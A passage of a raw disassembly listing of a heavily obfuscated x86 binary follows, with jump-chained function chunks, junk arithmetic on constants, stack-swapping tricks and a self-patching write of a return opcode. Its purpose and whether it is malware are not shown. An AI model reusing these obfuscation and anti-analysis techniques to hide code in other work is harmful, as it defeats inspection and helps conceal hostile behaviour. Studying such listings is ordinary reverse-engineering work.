		jmp	loc_44FAD1
sub_43C18D	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EAA2

loc_43C1A9:				; CODE XREF: sub_44EAA2:loc_44121Dj
		push	offset loc_444194
		jmp	loc_446EA1
; END OF FUNCTION CHUNK	FOR sub_44EAA2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4597AE

loc_43C1B3:				; CODE XREF: sub_4597AE:loc_4481C2j
		jno	loc_43E895
		mov	eax, [esp+0]
		push	edx
		push	ecx
		push	1EF66371h
		pop	ecx
		add	ecx, 3FDC45BDh
		xor	ecx, 3AFDEBD2h
		jmp	loc_444C9C
; END OF FUNCTION CHUNK	FOR sub_4597AE

; =============== S U B	R O U T	I N E =======================================



sub_43C1D5	proc near		; CODE XREF: sub_448CAE+C520p

; FUNCTION CHUNK AT 00450A7D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004562A7 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		add	eax, esi
		pop	esi
		mov	eax, [eax]
		popf
		jmp	loc_4562A7
sub_43C1D5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43C1E4:				; CODE XREF: y2kk37jd:00458439j
		add	ebx, edx
; START	OF FUNCTION CHUNK FOR sub_453B0B

loc_43C1E6:				; CODE XREF: sub_453B0B:loc_458420j
		sub	ecx, 60493EBh
		or	ecx, 0FCCCEF8Eh
		sub	ecx, 5EFB98B2h
		jmp	loc_446814
; END OF FUNCTION CHUNK	FOR sub_453B0B
; ---------------------------------------------------------------------------
		push	esi
		push	0AF1D168Ch
		pop	esi
; START	OF FUNCTION CHUNK FOR sub_448DCA

loc_43C204:				; CODE XREF: sub_448DCA:loc_43F783j
		and	esi, 19582D9Ah
		add	esi, 0F729DC30h
		mov	[esi], eax
		pop	esi
		lea	eax, sub_453583
		jmp	loc_450819
; END OF FUNCTION CHUNK	FOR sub_448DCA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_270. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458CE4

loc_43C21F:				; CODE XREF: sub_458CE4+19j
		jmp	loc_44328A
; END OF FUNCTION CHUNK	FOR sub_458CE4
; ---------------------------------------------------------------------------

loc_43C224:				; DATA XREF: y2kk37jd:00449473o
		add	ebx, 20CB167Eh
		sub	edx, ecx
		push	edx
		push	0DED2B58Bh
		pop	edx
		or	edx, 58664F0Fh
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43C239:				; CODE XREF: sub_445226:loc_44A1FBj
		jmp	loc_453F43
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		mov	ebx, edx
		jmp	sub_457533
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_106. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43C246:				; CODE XREF: y2kk37jd:0044D209j
		jmp	loc_44F733
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451634

loc_43C24B:				; CODE XREF: sub_451634-E8ACj
					; sub_451634:loc_44A02Bj
		mov	eax, [esp+4+var_4]
		push	eax
		push	edi
		push	0C68793C6h
		jmp	loc_451CE8
; END OF FUNCTION CHUNK	FOR sub_451634
; ---------------------------------------------------------------------------
		jmp	ds:dword_41E134
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4438B1

loc_43C260:				; CODE XREF: sub_4438B1+78EEj
		jmp	loc_43D6F5
; END OF FUNCTION CHUNK	FOR sub_4438B1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_457. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		and	dword ptr [eax-78FFFEB7h], 2Ch
		and	al, 8Bh
		aad	5Dh
		mov	eax, [esp]
		push	edx
		call	sub_441718
		jmp	loc_450BED
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4450D1

loc_43C27F:				; CODE XREF: sub_4450D1+B9A7j
		push	edx
		pop	esi
		xchg	esi, [esp+0]
		call	sub_44461D
		mov	eax, 729645CDh
		call	sub_44113A
		push	ecx
		jmp	loc_444CFC
; END OF FUNCTION CHUNK	FOR sub_4450D1
; ---------------------------------------------------------------------------
		ror	edx, 14h
		jmp	loc_450DBA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_43C2A1:				; CODE XREF: sub_45689F-17BF0j
		xor	eax, 6F4D89E0h

loc_43C2A7:				; CODE XREF: sub_45689F:loc_43EC96j
		xor	esi, 576A3636h
		add	esi, ebp
		add	esi, 1459BBF5h
		call	sub_451565

loc_43C2BA:				; CODE XREF: sub_451C7D-5481j
		jmp	loc_457B55
; END OF FUNCTION CHUNK	FOR sub_45689F

; =============== S U B	R O U T	I N E =======================================



sub_43C2BF	proc near		; DATA XREF: sub_4460E8:loc_453C9Co

arg_0		= dword	ptr  4

		add	esi, 0B2DFE3FEh
		popf
		xchg	esi, [esp-4+arg_0]

loc_43C2C9:				; CODE XREF: y2kk37jd:loc_440E10j
		mov	eax, [ebp-8]
		push	eax
sub_43C2BF	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_453867

loc_43C2CD:				; CODE XREF: sub_453867-8F2Fj
		push	0C916E5A3h
		jmp	loc_459AA5
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------

loc_43C2D7:				; CODE XREF: y2kk37jd:00440F72j
		mov	esi, eax

; =============== S U B	R O U T	I N E =======================================



sub_43C2D9	proc near		; CODE XREF: sub_44438E+Dp

; FUNCTION CHUNK AT 00443EC0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044BA94 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045806D SIZE 00000016 BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	eax, offset dword_449C40
		call	sub_4581BB
		lea	eax, [ebp-14h]
		jmp	loc_443EC0
sub_43C2D9	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4578A6

loc_43C2EF:				; CODE XREF: sub_4578A6-6F92j
		jnz	loc_44B29A

loc_43C2F5:				; CODE XREF: sub_4440AB-3715j
		jmp	loc_44F0D1
; END OF FUNCTION CHUNK	FOR sub_4578A6
; ---------------------------------------------------------------------------
		ror	esi, 0Bh
		jmp	loc_45AC21
; ---------------------------------------------------------------------------

loc_43C302:				; DATA XREF: sub_453867:loc_45A664o
		push	0DA67F3BCh
		pop	edi
		and	edi, ds:4000EDh
		cmp	edi, 6D23B190h
		jmp	loc_43D1ED
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_43C319:				; CODE XREF: sub_456809:loc_454584j
		sub	esi, ebx
		mov	[esi], ecx
		jmp	loc_44D4F4
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440AB

loc_43C322:				; CODE XREF: sub_4440AB+42AEj
		mov	ebp, esi
		pop	esi
		retn
; END OF FUNCTION CHUNK	FOR sub_4440AB

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_43C326	proc near		; CODE XREF: sub_43C06A+Ap
					; y2kk37jd:loc_43D371p	...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044D64F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B2B9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B6F5 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0045C5AC SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		jmp	loc_44D64F
sub_43C326	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43C32F:				; CODE XREF: y2kk37jd:0044295Aj
		jz	loc_457AE3

; =============== S U B	R O U T	I N E =======================================



sub_43C335	proc near		; CODE XREF: sub_44B2F0+6A75p

; FUNCTION CHUNK AT 0043C999 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043EBB3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442339 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00443951 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444455 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00447958 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00448E1E SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0045210F SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004550C6 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004580BA SIZE 0000000B BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	eax, 0D06F7C7Ch
		push	eax
		pushf
		call	sub_451FCB

loc_43C346:				; CODE XREF: sub_45C2E1+14j
		jmp	loc_444455
sub_43C335	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F285

loc_43C34B:				; CODE XREF: sub_43F285+905Cj
		jmp	sub_454D0F
; END OF FUNCTION CHUNK	FOR sub_43F285
; ---------------------------------------------------------------------------

loc_43C350:				; DATA XREF: sub_440FC9:loc_43DCA2o
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_455BDC
		jmp	loc_458E89
; ---------------------------------------------------------------------------
		push	ebx
		push	66242EDEh
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43C367:				; CODE XREF: sub_445226:loc_44FC3Bj
		pop	ebx
		or	ebx, 39B3F150h

loc_43C36E:				; CODE XREF: sub_45913D:loc_448991j
		add	ebx, 157F861Ch
		jmp	loc_4590EC
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4518C3

loc_43C379:				; CODE XREF: sub_4518C3-445Ej
					; sub_447E3E+A5BEj
		add	ebx, edx

loc_43C37B:				; CODE XREF: sub_4518C3:loc_43E8A4j
		push	edx
		mov	edx, edi
		xchg	edx, [esp+0]
		push	0CEA211E9h
		jmp	loc_459978
; END OF FUNCTION CHUNK	FOR sub_4518C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44753E

loc_43C38B:				; CODE XREF: sub_44753E+Fj
		jnb	loc_4542AF
		jmp	loc_45BD54
; END OF FUNCTION CHUNK	FOR sub_44753E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FA95

loc_43C396:				; CODE XREF: sub_44FA95:loc_451E8Bj
		or	eax, 0A12494F2h
		jnz	loc_43EDBB

loc_43C3A2:				; CODE XREF: y2kk37jd:loc_43B540j
					; y2kk37jd:004441A1j
		jmp	nullsub_340
; END OF FUNCTION CHUNK	FOR sub_44FA95
; ---------------------------------------------------------------------------
		shr	ecx, 13h
		jmp	loc_43EDAC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445083

loc_43C3AF:				; CODE XREF: sub_445083-10D0j
		push	offset loc_43B98C
		jmp	loc_459B5F
; END OF FUNCTION CHUNK	FOR sub_445083
; ---------------------------------------------------------------------------
		jmp	ds:dword_41E180
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
		dd 582D80h, 19E85A00h, 0E90000C8h, 0EF94h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441856

loc_43C3D0:				; CODE XREF: sub_441856-5E0Cj
		jmp	loc_45824A
; END OF FUNCTION CHUNK	FOR sub_441856
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_335. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455958

loc_43C3D6:				; CODE XREF: sub_455958+Dj
		jmp	loc_4532C8
; END OF FUNCTION CHUNK	FOR sub_455958
; ---------------------------------------------------------------------------

loc_43C3DB:				; CODE XREF: y2kk37jd:0044EC96j
		jmp	locret_4532E9
; ---------------------------------------------------------------------------

loc_43C3E0:				; CODE XREF: y2kk37jd:0044A66Ej
		jnz	loc_4545A1
		and	esi, 0D8A4C7ABh
		jmp	sub_4568B4

; =============== S U B	R O U T	I N E =======================================



sub_43C3F1	proc near		; CODE XREF: y2kk37jd:0043DF56j
					; sub_451A35-B83Ep

arg_4		= dword	ptr  8

		xchg	edx, [esp+0]
		pop	edx
		add	edx, 7FA31029h
		popf
		xchg	edx, [esp-8+arg_4]
		jmp	sub_441856
sub_43C3F1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442B26

loc_43C404:				; CODE XREF: sub_442B26+13j
		jl	loc_44BB93
; END OF FUNCTION CHUNK	FOR sub_442B26
; START	OF FUNCTION CHUNK FOR sub_4564EB

loc_43C40A:				; CODE XREF: sub_4564EB-34C4j
		jmp	loc_43FB55
; END OF FUNCTION CHUNK	FOR sub_4564EB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CDD5

loc_43C40F:				; CODE XREF: sub_44CDD5-64BEj
		jmp	loc_458CDD
; END OF FUNCTION CHUNK	FOR sub_44CDD5
; ---------------------------------------------------------------------------
		push	edi
		jmp	loc_44BB85
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44594E

loc_43C41B:				; CODE XREF: sub_44594E+15080j
		jmp	loc_450B51
; END OF FUNCTION CHUNK	FOR sub_44594E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_43C420:				; CODE XREF: sub_4448E2+7C66j
		add	eax, 870A3077h
		ror	eax, 10h
		add	eax, 12411686h
		mov	edx, [esp+0]
		push	esi
		mov	esi, eax
		jmp	loc_44EB39
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------

loc_43C43A:				; CODE XREF: y2kk37jd:00444EB7j
		jnz	loc_450E3C
		jmp	loc_43F790
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449E69

loc_43C445:				; CODE XREF: sub_449E69:loc_457394j
		setz	al
		jmp	loc_4508D6
; END OF FUNCTION CHUNK	FOR sub_449E69
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452C0C

loc_43C44D:				; CODE XREF: sub_452C0C:loc_454578j
		cmp	dword ptr [ebp-10h], 0
		jnz	loc_44E4C8

loc_43C457:				; CODE XREF: y2kk37jd:loc_459CF7j
		mov	eax, [ebp+8]
		push	eax
		cmp	dword ptr [ebp-14h], 6
		setz	al
		jmp	loc_4508D6
; END OF FUNCTION CHUNK	FOR sub_452C0C
; ---------------------------------------------------------------------------

loc_43C467:				; CODE XREF: y2kk37jd:0043E16Ej
		jl	loc_451363

; =============== S U B	R O U T	I N E =======================================



sub_43C46D	proc near		; CODE XREF: sub_442F52+12p

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043B9CF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043B9D9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043BE3B SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0043C88E SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0043D65C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043E50E SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00440BD2 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00441218 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445F1A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044A5C5 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044B789 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00452B70 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454E41 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457D05 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004589EA SIZE 0000001B BYTES

		xchg	esi, [esp-4+arg_0]
		pop	esi
		xchg	esi, [esp+0]
		call	sub_45AAD1
		jmp	loc_457D05
sub_43C46D	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_334. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_43C47F:				; CODE XREF: sub_43ED19+13896j
		jmp	loc_452A15
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F618

loc_43C484:				; CODE XREF: sub_43F618:loc_455AD3j
		jz	loc_43C0EC
		add	ecx, ebp
		and	ebp, edx
		jmp	loc_43C0EA
; END OF FUNCTION CHUNK	FOR sub_43F618
; ---------------------------------------------------------------------------

loc_43C493:				; CODE XREF: y2kk37jd:0044C661j
		push	0D4D3D136h

; =============== S U B	R O U T	I N E =======================================



sub_43C498	proc near		; CODE XREF: sub_43FDE6+579Bp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043B14A SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044082B SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004596C9 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		xchg	ebx, [esp-4+arg_0]
		call	sub_45ADEC
		jmp	loc_4596C9
sub_43C498	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43C4A9	proc near		; DATA XREF: sub_44D006+3o

; FUNCTION CHUNK AT 0043BFE4 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00448097 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0045322C SIZE 00000005 BYTES

		xchg	ebp, [esp+0]
		push	0E6A6C438h
		pop	esi
		and	esi, 0D617F7E6h
		jmp	loc_45322C
sub_43C4A9	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		rol	ecx, 11h
		jmp	sub_45433F
; ---------------------------------------------------------------------------
		mov	eax, 0CB39536Bh
		push	edi
		push	11347FD4h
		pop	edi
		jmp	loc_43C178
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408B9

loc_43C4D6:				; CODE XREF: sub_4408B9+1ED2j
		sbb	ecx, 0E0E94BE6h

loc_43C4DC:				; CODE XREF: sub_4408B9:loc_4562DAj
		mov	eax, 0DD960900h
		push	ebp
		adc	ebp, 0AEBC93EFh
		jmp	loc_458E9E
; END OF FUNCTION CHUNK	FOR sub_4408B9
; ---------------------------------------------------------------------------

loc_43C4ED:				; CODE XREF: y2kk37jd:00458A2Aj
		cmp	eax, edi
		jmp	loc_448153
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4456D8

loc_43C4F4:				; CODE XREF: sub_4456D8+Fj
		pop	ecx
		rol	ecx, 14h
		add	ecx, 45E2D75Bh
		xchg	ecx, [esp-4+arg_0]
		jmp	loc_453196
; END OF FUNCTION CHUNK	FOR sub_4456D8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_306. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44931C

loc_43C507:				; CODE XREF: sub_44931C-359Bj
		jmp	loc_444B97
; END OF FUNCTION CHUNK	FOR sub_44931C
; ---------------------------------------------------------------------------

locret_43C50C:				; CODE XREF: y2kk37jd:00454D2Dj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B163

loc_43C50D:				; CODE XREF: sub_43B163+B0C5j
		jmp	loc_445670
; END OF FUNCTION CHUNK	FOR sub_43B163

; =============== S U B	R O U T	I N E =======================================



sub_43C512	proc near		; DATA XREF: sub_45689F+59E8o
		xchg	edx, [esp+0]
sub_43C512	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_445226

loc_43C515:				; CODE XREF: sub_445226:loc_44FA3Aj
		call	sub_451A35
		test	eax, eax
		jz	loc_43D804
		jmp	loc_456962
; ---------------------------------------------------------------------------

loc_43C527:				; CODE XREF: sub_445226+8A6Fj
		adc	eax, 0A117503Fh
		sbb	esi, edi
		rol	ebp, 13h
		jmp	loc_452593
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4543EF

loc_43C537:				; CODE XREF: sub_4543EF:loc_453437j
		push	ecx
		mov	ecx, edx
		xchg	ecx, [esp+4+var_4]
		push	offset sub_43F811
		jmp	loc_443EBB
; END OF FUNCTION CHUNK	FOR sub_4543EF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43C547:				; CODE XREF: sub_445226:loc_459413j
		jnz	loc_43CF5D
		jmp	loc_43BD08
; END OF FUNCTION CHUNK	FOR sub_445226
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_31. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43C553:				; CODE XREF: y2kk37jd:00454BC6j
		jmp	locret_43FD44
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B5AF

loc_43C558:				; CODE XREF: sub_43B5AF:loc_44463Bj
		push	0CD8D47D3h
; END OF FUNCTION CHUNK	FOR sub_43B5AF
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_43C55D:				; CODE XREF: sub_43ED19+CCF0j
		ror	eax, 0Fh
		jmp	loc_44BAFE
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------
		shr	esi, 8
		jmp	sub_43D67C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4577FE

loc_43C56D:				; CODE XREF: sub_4577FE-27AAj
		popf
		xchg	eax, [esp-4+arg_0]
		jmp	loc_459F47
; END OF FUNCTION CHUNK	FOR sub_4577FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554A3

loc_43C576:				; CODE XREF: sub_4554A3-1730Bj
		sub	eax, 0EF2E705Fh

loc_43C57C:				; CODE XREF: sub_4554A3:loc_446201j
		push	0DD63CDABh
		pop	eax
		rol	eax, 1
		add	eax, 648F1124h
		call	sub_453FBA
; END OF FUNCTION CHUNK	FOR sub_4554A3
; START	OF FUNCTION CHUNK FOR sub_43B765

loc_43C58F:				; CODE XREF: sub_43B765+111B8j
		mov	edx, [ebp+0]
		jmp	loc_4533E7
; END OF FUNCTION CHUNK	FOR sub_43B765
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F75D

loc_43C597:				; CODE XREF: sub_4514DE:loc_43D613j
					; sub_43F75D-8Fj ...
		call	sub_45B7AA

loc_43C59C:				; DATA XREF: sub_44B6E8-5E28o
		push	ecx
		mov	ecx, edx
		xchg	ecx, [esp+4+var_4]
		push	eax
		push	339C2B2Fh
		pop	eax
		jmp	loc_4599A0
; END OF FUNCTION CHUNK	FOR sub_43F75D
; ---------------------------------------------------------------------------

loc_43C5AE:				; CODE XREF: y2kk37jd:0045859Ej
		jnb	loc_441C5E

; =============== S U B	R O U T	I N E =======================================



sub_43C5B4	proc near		; CODE XREF: sub_44F641+1AAFp

arg_0		= dword	ptr  4

		xchg	esi, [esp+0]
		pop	esi
		mov	ecx, [ecx]
		xchg	ecx, [esp-4+arg_0]
		retn
sub_43C5B4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442C0A

loc_43C5BE:				; CODE XREF: sub_442C0A+Dj
		jmp	loc_44B3B0
; END OF FUNCTION CHUNK	FOR sub_442C0A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B1D6

loc_43C5C3:				; CODE XREF: sub_43B1D6:loc_45C4C3j
		mov	ebp, esi
		call	sub_45A2F9

loc_43C5CA:				; CODE XREF: sub_44A326+E854j
		jmp	loc_43C720
; END OF FUNCTION CHUNK	FOR sub_43B1D6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4577FE

loc_43C5CF:				; CODE XREF: sub_4577FE:loc_443E9Bj
		jmp	loc_43DB66
; END OF FUNCTION CHUNK	FOR sub_4577FE
; ---------------------------------------------------------------------------

loc_43C5D4:				; CODE XREF: y2kk37jd:00453E57j
		mov	ecx, [ebx]

; =============== S U B	R O U T	I N E =======================================



sub_43C5D6	proc near		; CODE XREF: y2kk37jd:0043B0DDp
		xchg	ecx, [esp+0]
		pop	ecx
		call	nullsub_451
		jmp	ds:dword_41E0C0
sub_43C5D6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445BE8

loc_43C5E5:				; CODE XREF: sub_445BE8+1174Cj
		jmp	loc_44524F
; END OF FUNCTION CHUNK	FOR sub_445BE8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D6BF

loc_43C5EA:				; CODE XREF: sub_44D6BF+2AB0j
		test	ecx, ebp
		jmp	loc_4518F2
; END OF FUNCTION CHUNK	FOR sub_44D6BF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45070F

loc_43C5F1:				; CODE XREF: sub_45070F+BA60j
		or	eax, 15229D3Bh
		xor	eax, 507992F4h
		rol	eax, 5
		add	eax, 5F499953h
		jmp	loc_45795E
; END OF FUNCTION CHUNK	FOR sub_45070F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4432FD

loc_43C60B:				; CODE XREF: sub_4432FD:loc_451431j
		cdq
		shr	esi, 2
		jmp	loc_44D501
; END OF FUNCTION CHUNK	FOR sub_4432FD
; ---------------------------------------------------------------------------
		mov	ds:dword_41E1B8, eax
		lea	eax, nullsub_462
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_462

; =============== S U B	R O U T	I N E =======================================



sub_43C628	proc near		; CODE XREF: sub_41810B+30p
					; sub_43C628+5j
					; DATA XREF: ...
		call	sub_43C638
		jmp	ds:off_41E1E8
sub_43C628	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448658

loc_43C633:				; CODE XREF: sub_448658+894Dj
		jmp	loc_44F8EB
; END OF FUNCTION CHUNK	FOR sub_448658

; =============== S U B	R O U T	I N E =======================================



sub_43C638	proc near		; CODE XREF: sub_43C628p
					; sub_4411C3+10124j ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043BD35 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004512EC SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00451BC3 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00453A4D SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00455672 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459622 SIZE 00000017 BYTES

		jo	loc_4512EC

loc_43C63E:				; CODE XREF: y2kk37jd:loc_459D61j
		xchg	ebp, [esp+0]
		jmp	loc_451BC3
sub_43C638	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		sub	ecx, 7C1177CFh
		jmp	sub_44AA4A
; ---------------------------------------------------------------------------

loc_43C651:				; CODE XREF: y2kk37jd:loc_44DE99j
		xchg	eax, [esi]
		jmp	loc_44D547
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_43C658:				; CODE XREF: sub_4448E2+15321j
		jge	loc_447092
		jmp	loc_45B6BE
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
		pushf
		jmp	sub_44B508
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_263. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E9F

loc_43C66A:				; CODE XREF: sub_451E9F-12F1Cj
		jmp	loc_4574A9
; END OF FUNCTION CHUNK	FOR sub_451E9F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451464

loc_43C66F:				; CODE XREF: sub_451464-1632Fj
		sub	eax, 0B18E7D11h
		add	eax, 0DB0AE838h
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_443B4E
		jmp	loc_4405E9
; END OF FUNCTION CHUNK	FOR sub_451464
; ---------------------------------------------------------------------------
		dw 8A0Fh
		dd 0DA20h, 7CF4E9h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4459CC

loc_43C695:				; CODE XREF: sub_4459CC:loc_458EF1j
		pop	ebx
		xchg	ebx, [esp-4+arg_0]
		call	sub_44B117
; END OF FUNCTION CHUNK	FOR sub_4459CC
; START	OF FUNCTION CHUNK FOR sub_448658

loc_43C69E:				; CODE XREF: sub_448658+10j
		jmp	loc_45A429
; END OF FUNCTION CHUNK	FOR sub_448658
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4545C0

loc_43C6A4:				; CODE XREF: sub_4545C0+1j
					; sub_442938+1900Aj
		jmp	loc_43DE9B
; END OF FUNCTION CHUNK	FOR sub_4545C0
; ---------------------------------------------------------------------------

loc_43C6A9:				; CODE XREF: y2kk37jd:0043BCFDj
		jmp	loc_44F578
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_43C6AE:				; CODE XREF: sub_453867:loc_44F87Ej
		call	sub_4577FE
		test	al, al
		jz	nullsub_197
		jmp	loc_4524AA
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------

loc_43C6C0:				; CODE XREF: y2kk37jd:loc_44B202j
		jnz	loc_43CBC3
		jmp	loc_447845
; ---------------------------------------------------------------------------

loc_43C6CB:				; CODE XREF: y2kk37jd:loc_4469F9j
					; y2kk37jd:0044C3F4j
					; DATA XREF: ...
		pop	eax
		push	offset loc_43B551
